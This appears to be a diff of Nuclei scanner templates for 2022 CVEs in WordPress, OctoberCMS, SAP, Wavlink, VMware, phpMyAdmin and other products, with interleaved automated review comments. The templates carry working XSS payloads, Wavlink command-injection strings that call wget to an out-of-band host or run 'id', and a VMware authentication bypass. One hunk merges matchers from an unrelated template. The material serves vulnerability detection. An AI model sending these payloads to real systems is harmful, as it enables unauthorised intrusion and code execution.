cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 2 - vendor: awin - product: awin_data_feed - framework: wordpress - tags: cve,cve2022,xss,awin,wpscan,wp-plugin,wp,wordpress,authenticated - -http: + verified: "true" + tags: cve,cve2022,wp-plugin,xss,wp,wordpress,authenticated,awin +requests: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -38,12 +27,12 @@ http: - | GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true + req-condition: true matchers: - type: dsl dsl: - - 'contains(header_2, "text/html")' + - 'contains(all_headers_2, "text/html")' - 'status_code_2 == 200' - contains(body_2, 'colspan=\"2\">') condition: and -# digest: 4a0a004730450220584cc41e248fdd4e5d7ede82b4f73c59e55c013f910bf2b6c7b889277d1462790221009a71639dbca66975e622909a29c65a2145db41ec8391634ff9fdfa796a3ef6ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-21705.yaml b/poc/cve/CVE-2022-21705.yaml index 9593590558..d48170c9cf 100644 --- a/poc/cve/CVE-2022-21705.yaml +++ b/poc/cve/CVE-2022-21705.yaml 
@@ -1,33 +1,23 @@ id: CVE-2022-21705 - info: - name: October CMS - Remote Code Execution + name: OctoberCMS Authenticated Remote Code Execution author: iPhantasmic severity: high description: | - October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. + Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area. remediation: | - The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. + The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually. 
reference: - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-21705 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-21705 - cwe-id: CWE-74,NVD-CWE-Other - epss-score: 0.00522 - epss-percentile: 0.74238 - cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* - metadata: - max-request: 5 - vendor: octobercms - product: october + cwe-id: CWE-74 tags: cve,cve2022,authenticated,rce,cms,octobercms,injection - -http: +requests: - raw: - | # to obtain session_key and token GET /backend/backend/auth/signin HTTP/1.1 
@@ -65,49 +55,40 @@ http: X-Requested-With: XMLHttpRequest _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'function onInit()' - - 'phpinfo()' - - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.' - condition: and - - # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled - - - type: status - status: - - 200 - + cookie-reuse: true extractors: - type: xpath name: session_key - internal: true + attribute: value xpath: - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" - attribute: value - - # Obtain _session_key for current OctoberCMS session - + internal: true + # Obtain _session_key for current OctoberCMS session - type: xpath name: token - internal: true + attribute: value xpath: - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" - attribute: value - - # Obtain _token for current OctoberCMS session - + internal: true + # Obtain _token for current OctoberCMS session - type: regex name: theme + part: body group: 1 regex: - '' + matchers-condition: and matchers: - type: word @@ -27,10 +40,13 @@ requests: - "" - "Contact Form 7" condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a00473045022100f145e5739cd27980072ebec895fee4de42c05ea932a35b605cc185b4b988098e0220731f2a16fae46104c75bb03a03567449ac32c11f85f09e384265a890b30f7794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-22536.yaml b/poc/cve/CVE-2022-22536.yaml index 193d0c83c3..d029dc872d 100644 --- a/poc/cve/CVE-2022-22536.yaml +++ b/poc/cve/CVE-2022-22536.yaml 
@@ -1,21 +1,34 @@ id: CVE-2022-22536 + info: name: SAP Memory Pipes (MPI) Desynchronization author: pdteam severity: critical description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. + remediation: | + Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22536 - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022 - https://github.com/Onapsis/onapsis_icmad_scanner - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/ + - https://launchpad.support.sap.com/#/notes/3123396 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2022-22536 cwe-id: CWE-444 - tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes -requests: + epss-score: 0.95701 + epss-percentile: 0.99252 + cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: sap + product: content_server + shodan-query: http.favicon.hash:-266008933 + tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev + +http: - raw: - |+ GET {{sap_path}} HTTP/1.1 
@@ -29,22 +42,22 @@ requests: Host: {{Hostname}} payloads: - sap_path: # based on https://github.com/Onapsis/onapsis_icmad_scanner + sap_path: + # based on https://github.com/Onapsis/onapsis_icmad_scanner - /sap/admin/public/default.html - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png + stop-at-first-match: true unsafe: true read-all: true - stop-at-first-match: true + matchers-condition: and matchers: - - type: status - status: - - 200 - type: dsl dsl: - - "contains(tolower(body), 'administration')" # confirms 1st path - - "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path + - "contains(tolower(body), 'administration')" + - "contains(tolower(header), 'content-type: image/png')" condition: or + - type: word part: body words: @@ -53,4 +66,7 @@ requests: - "HTTP/1.0 500 Dispatching Error" condition: or -# Enhanced by mp on 2022/03/08 + - type: status + status: + - 200 +# digest: 4a0a0047304502205863287a57d4e9aa73f4c5618d2ceda056e1d44d6376dc53f8eeec8ac3923a78022100dc80eee5ae506ca3eeb5d2ba1aab21c58f5866d7cc97c2ee826c593f3c5e2de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-2290.yaml b/poc/cve/CVE-2022-2290.yaml index 61f61c9a52..95e4ee6012 100644 --- a/poc/cve/CVE-2022-2290.yaml +++ b/poc/cve/CVE-2022-2290.yaml 
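Review bot: In poc/cve/CVE-2022-22536.yaml the two `dsl` expressions lose their trailing comments, so with `condition: or` nothing states which probe path each expression confirms. I would keep them on the new lines: `- "contains(tolower(body), 'administration')" # confirms 1st path` and `- "contains(tolower(header), 'content-type: image/png')" # confirms 2nd path`. The request block starts above this hunk and the word matcher continues into the next one.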
@@ -1,42 +1,30 @@ id: CVE-2022-2290 - info: - name: Trilium <0.52.4 - Cross-Site Scripting + name: Trilium - Cross-Site Scripting author: dbrwsky severity: medium - description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. - remediation: | - Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability. + description: Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta. reference: - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/ - https://github.com/zadam/trilium - - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7 - https://nvd.nist.gov/vuln/detail/CVE-2022-2290 + - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2290 cwe-id: CWE-79 - epss-score: 0.00112 - epss-percentile: 0.44562 - cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 3 - vendor: trilium_project - product: trilium shodan-query: title:"Trilium Notes" - tags: cve,cve2022,xss,trilium,huntr - -http: + verified: "true" + tags: cve,cve2022,xss,trilium +requests: - method: GET path: - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E' - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E' - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename' - stop-at-first-match: true - matchers-condition: and matchers: - type: word 
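Review bot: The new side of poc/cve/CVE-2022-2290.yaml drops `stop-at-first-match: true` from the request block, so all three probe paths are sent to a host even after the first one has matched. That adds traffic and duplicate findings without improving detection; I would keep `stop-at-first-match: true` above `matchers-condition: and`. The same line is removed in this commit from poc/cve/CVE-2022-26134.yaml, where it means a second command-execution probe goes to a host the first request already confirmed, and from poc/cve/CVE-2022-26564.yaml. The matcher list continues in the next hunk.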
@@ -45,13 +33,10 @@ http: - "No handler matched for custom " - "Note '' not found" condition: or - - type: word part: header words: - "text/html" - - type: status status: - 404 -# digest: 4b0a00483046022100e568371eb4d2df619288c86a7c53af212ddafb9026990a8577b3b539e909bc26022100c175a69227a5a573c084cb0ea237fd84fe97fabb311373d69d5ecd94b7fb8a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-22972.yaml b/poc/cve/CVE-2022-22972.yaml index f0934ac0fe..fd63a42624 100644 --- a/poc/cve/CVE-2022-22972.yaml +++ b/poc/cve/CVE-2022-22972.yaml @@ -1,10 +1,13 @@ id: CVE-2022-22972 + info: name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass author: For3stCo1d,princechaddha severity: critical description: | VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + remediation: | + Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). reference: - https://github.com/horizon3ai/CVE-2022-22972 - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive @@ -15,10 +18,17 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22972 cwe-id: CWE-287 + epss-score: 0.73656 + epss-percentile: 0.97808 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: + max-request: 3 + vendor: vmware + product: identity_manager fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" tags: cve,cve2022,vmware,auth-bypass,oast -requests: + +http: - raw: - | GET /vcac/ HTTP/1.1 
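Review bot: The last line of the poc/cve/CVE-2022-2290.yaml hunk removes the `# digest:` trailer, and the older revision that replaces the file carries none. If that trailer is the upstream template signature, as its format suggests, consumers of this repository can no longer check that the copy matches what the signer published. The commit author is listed as GitHub Action, so I would have the job keep a signed revision where one already exists rather than overwrite it with an unsigned one. The same removal occurs in the CVE-2022-23944, CVE-2022-24681, CVE-2022-2487, CVE-2022-24899, CVE-2022-25323, CVE-2022-26134, CVE-2022-26352 and CVE-2022-26564 templates.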
@@ -32,62 +42,70 @@ requests: Content-type: application/x-www-form-urlencoded protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in - redirects: true + + host-redirects: true max-redirects: 3 - cookie-reuse: true + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "HZN=" + + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 302 + extractors: - type: regex - part: body name: protected_state group: 1 regex: - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' internal: true - - type: regex part: body + + - type: regex name: horizonRelayState group: 1 regex: - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' internal: true - - type: regex part: body + + - type: regex name: userstore group: 1 regex: - 'id="userstore" value="([a-z.]+)" \/>' internal: true - - type: regex part: body + + - type: regex name: userstoreDisplay group: 1 regex: - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' internal: true - - type: regex part: body + + - type: regex name: stickyConnectorId group: 1 regex: - 'name="stickyConnectorId" value="(.*)"/>' internal: true + part: body + - type: kval - part: header name: HZN-Cookie kval: - 'HZN' - matchers-condition: and - matchers: - - type: word part: header - words: - - "HZN=" - - type: status - status: - - 302 - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/06/01 +# digest: 4a0a0047304502205ea4f76288f0767688c76ac88d6646c7afdc34c972b66c6893d7b3d6fa91a65402210086434def00a915135952f121a758d3eb9cd8e56139bf16acdf6d075f84251f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-23808.yaml b/poc/cve/CVE-2022-23808.yaml index 76fe8e3523..3f6cbaeb07 100644 
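Review bot: The `kval` extractor `HZN-Cookie` at the end of the extractor list in poc/cve/CVE-2022-22972.yaml is the only extractor without `internal: true`, so the value of the `HZN` cookie is written into the scan results of every matching host. Given the `HZN=` header matcher, that value is presumably a session cookie issued after the bypass, which makes reports and logs from this template credential material. If the value is not needed for triage I would add `internal: true` to that extractor; otherwise a comment such as `# output contains a live session cookie; treat results as secret` would document it. The request block starts above this hunk.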
--- a/poc/cve/CVE-2022-23808.yaml
+++ b/poc/cve/CVE-2022-23808.yaml
@@ -1,33 +1,58 @@ id: CVE-2022-23808 + info: - name: phpMyAdmin < 5.1.2 - XSS - author: cckuailong + name: phpMyAdmin < 5.1.2 - Cross-Site Scripting + author: cckuailong,daffainfo severity: medium - description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection. + description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. + remediation: | + Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability. reference: - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A - https://github.com/dipakpanchal456/CVE-2022-23808 - https://nvd.nist.gov/vuln/detail/CVE-2022-23808 - tags: cve,cve2022,phpmyadmin,xss + - https://www.phpmyadmin.net/security/PMASA-2022-2/ + - https://infosecwriteups.com/exploit-cve-2022-23808-85041c6e5b97 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-23808 cwe-id: CWE-79 -requests: + epss-score: 0.00154 + epss-percentile: 0.51705 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: phpmyadmin + product: phpmyadmin + shodan-query: http.component:"phpmyadmin" + tags: cve,cve2022,phpmyadmin,xss + +http: - method: GET path: - - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=\">'>" + - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + stop-at-first-match: true + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word - part: header + part: body words: - - "text/html" + - "\">" + - "

Add a new server

" + - "phpMyAdmin setup" + condition: and + - type: word - part: body + part: header words: - - "\">'><script>alert(document.domain)</script>" + - "text/html" + + - type: status + status: + - 200 +# digest: 490a0046304402207ef9c03e2ba89559567a9ea490a43e71d81964ca36c5c0498387428d33ef02770220105bdfaeadca81a017e95a173fa5c0d08952f5c278eaae804c9e3fc0be2d151a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-23944.yaml b/poc/cve/CVE-2022-23944.yaml index 2538469391..d7ffa8675e 100644 --- a/poc/cve/CVE-2022-23944.yaml +++ b/poc/cve/CVE-2022-23944.yaml 
@@ -1,36 +1,22 @@ id: CVE-2022-23944 - info: name: Apache ShenYu Admin Unauth Access author: cckuakilong - severity: critical - description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1. + severity: medium + description: "Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1." remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch. reference: - https://github.com/apache/incubator-shenyu/pull/2462 - https://nvd.nist.gov/vuln/detail/CVE-2022-23944 - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md - - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y - - http://www.openwall.com/lists/oss-security/2022/01/25/15 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 cve-id: CVE-2022-23944 - cwe-id: CWE-306,CWE-862 - epss-score: 0.42994 - epss-percentile: 0.96982 - cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: apache - product: shenyu + cwe-id: CWE-862 tags: cve,cve2022,shenyu,unauth,apache - -http: +requests: - method: GET path: - "{{BaseURL}}/plugin" - matchers-condition: and matchers: - type: word @@ -39,8 +25,8 @@ http: - '"message":"query success"' - '"code":200' condition: and - - type: status status: - 200 -# digest: 4b0a00483046022100ddae40f6f89f1fe24f409a95d9b0ec4473092050de7b824991b629cbad6e5523022100a60546c2643a321a709a4a341ad80214d5f1ecad1481a20cc092fe0304f4e0eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/08 diff --git a/poc/cve/CVE-2022-24681.yaml b/poc/cve/CVE-2022-24681.yaml index 56b957f25b..ae88561611 100644 --- a/poc/cve/CVE-2022-24681.yaml +++ b/poc/cve/CVE-2022-24681.yaml 
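Review bot: The new side of poc/cve/CVE-2022-23944.yaml lowers `severity` from critical to medium and deletes the `cvss-metrics` and `cvss-score: 9.1` lines, while the description still states that the /plugin API is reachable without authentication. Findings from this template would then be triaged below the score the removed classification gave them. I would keep `severity: critical` together with `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N` and `cvss-score: 9.1`. The start of the matcher block lies between the two hunks on this line and is not shown.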
@@ -1,60 +1,43 @@ id: CVE-2022-24681 - info: - name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting + name: ManageEngine ADSelfService - Stored XSS author: Open-Sec severity: medium description: | - ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. - remediation: | - Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability. + Zoho ManageEngine ADSelfService Plus before 6121 allows XSS via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screen. reference: - https://raxis.com/blog/cve-2022-24681 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html - https://manageengine.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 - - https://www.manageengine.com/products/self-service-password/kb/CVE-2022-24681.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-24681 cwe-id: CWE-79 - epss-score: 0.00155 - epss-percentile: 0.5183 - cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: zohocorp - product: manageengine_adselfservice_plus tags: cve,cve2022,manageengine,xss,authenticated - -http: +requests: - raw: - | POST /servlet/GetProductVersion HTTP/1.1 Host: {{Hostname}} - + extractors: + - type: regex + part: body + name: buildnumber + group: 1 + regex: + - '"BUILD_NUMBER":"([0-9]+)",' + internal: true matchers-condition: and matchers: - type: dsl dsl: - compare_versions(buildnumber, '< 6121') - - type: word part: body words: - "ManageEngine" - - type: status status: - 200 - - extractors: - - type: regex - name: buildnumber - group: 1 - regex: - - '"BUILD_NUMBER":"([0-9]+)",' - internal: true 
- part: body -# digest: 4b0a00483046022100943bdfc6b66835ee4a234741e43d2ec75b694950e279f5242e7a01a4678f7b0b022100a2186b5ffdf981315dfaf2d8cff304a9da997e188f67a9f66a51044c21c7b4ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-2486.yaml b/poc/cve/CVE-2022-2486.yaml index 2c3533d673..9112ebd6f1 100644 --- a/poc/cve/CVE-2022-2486.yaml +++ b/poc/cve/CVE-2022-2486.yaml 
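Review bot: As written, poc/cve/CVE-2022-24681.yaml reports the stored XSS purely from the build number: the only request is `POST /servlet/GetProductVersion`, and the deciding matcher is `compare_versions(buildnumber, '< 6121')`. Nothing in the file says so, and the `authenticated` tag suggests a login that the template never performs. I would add a comment above the request, `# version-based detection only: reads BUILD_NUMBER, does not exercise the XSS`, and keep the removed `remediation` text so a finding points to the fixed build.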
@@ -1,34 +1,48 @@ id: CVE-2022-2486 + info: - name: Wavlink Mesh.cgi - Remote Code Execution + name: Wavlink WN535K2/WN535K3 - OS Command Injection author: For3stCo1d severity: critical description: | - A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used. + Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486 - https://vuldb.com/?id.204537 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2486 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-2486 cwe-id: CWE-78 + epss-score: 0.97375 + epss-percentile: 0.99887 + cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" tags: cve,cve2022,iot,wavlink,router,rce,oast -requests: + +http: - raw: - | - GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 + GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: status status: - 500 
+# digest: 4a0a0047304502206d4aca9ab8268d394d35bdb9fc196da5d58d60e950b0dd01e1a15ea6b0182d7e022100b29fb103ac088880efc4bbf33bb823a5c75d7597d46f4b54f34541b0878aa641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-2487.yaml b/poc/cve/CVE-2022-2487.yaml index 7e44310508..899076eb8b 100644 --- a/poc/cve/CVE-2022-2487.yaml +++ b/poc/cve/CVE-2022-2487.yaml 
@@ -1,37 +1,26 @@ id: CVE-2022-2487 - info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection + name: Wavlink Nightled.cgi - Remote Code Execution author: For3stCo1d severity: critical description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - remediation: | - Apply the latest firmware update provided by the vendor to mitigate this vulnerability. + A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487 - https://vuldb.com/?id.204538 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2487 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-2487 cwe-id: CWE-78 - epss-score: 0.97419 - epss-percentile: 0.99917 - cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: wavlink - product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" tags: cve,cve2022,iot,wavlink,router,rce,oast variables: cmd: "id" - -http: +requests: - raw: - | @timeout: 10s @@ -40,7 +29,6 @@ http: Content-Type: application/x-www-form-urlencoded page=night_led&start_hour=;{{cmd}}; - matchers-condition: and matchers: - type: word 
@@ -48,14 +36,7 @@ http: words: - "uid=" - "gid=" - - "nightStart" condition: and - - - type: word - words: - - text/html - - type: status status: - 200 -# digest: 490a0046304402207f00334b2f5d0c361a6b2ff01119f94144ec181f8e092351ee454be79f474a9502204a45c0633a005068fee451a63fa604d3bfebbae5409461dcd2b665097635acb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-24899.yaml b/poc/cve/CVE-2022-24899.yaml index a31d7db7e6..f5827141b0 100644 --- a/poc/cve/CVE-2022-24899.yaml +++ b/poc/cve/CVE-2022-24899.yaml 
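Review bot: This hunk of poc/cve/CVE-2022-2487.yaml removes the `"nightStart"` word and the `text/html` matcher, leaving only `uid=` and `gid=` plus status 200 to confirm the result. Any 200 response containing those two strings would then match, which raises the false-positive rate for a finding rated critical; I would keep `- "nightStart"` in the word list. poc/cve/CVE-2022-25323.yaml loses its `text/html` header matcher in the same commit, so a reflection in a non-HTML response would be reported as XSS there. The start of the word matcher lies outside this hunk.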
@@ -1,38 +1,26 @@ id: CVE-2022-24899 - info: - name: Contao <4.13.3 - Cross-Site Scripting + name: Contao 4.13.2 - Cross-Site Scripting (XSS) author: ritikchaddha severity: medium description: | - Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag. - remediation: As a workaround, users may disable canonical tags in the root page settings. + Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings. reference: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - https://nvd.nist.gov/vuln/detail/CVE-2022-24899 - - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html - - https://github.com/contao/contao/commit/199206849a87ddd0fa5cf674eb3c58292fd8366c classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-24899 cwe-id: CWE-79 - epss-score: 0.00342 - epss-percentile: 0.68354 - cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: contao - product: contao shodan-query: title:"Contao" - tags: cve,cve2022,contao,xss,huntr - -http: + tags: cve,cve2022,contao,xss +requests: - method: GET path: - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word 
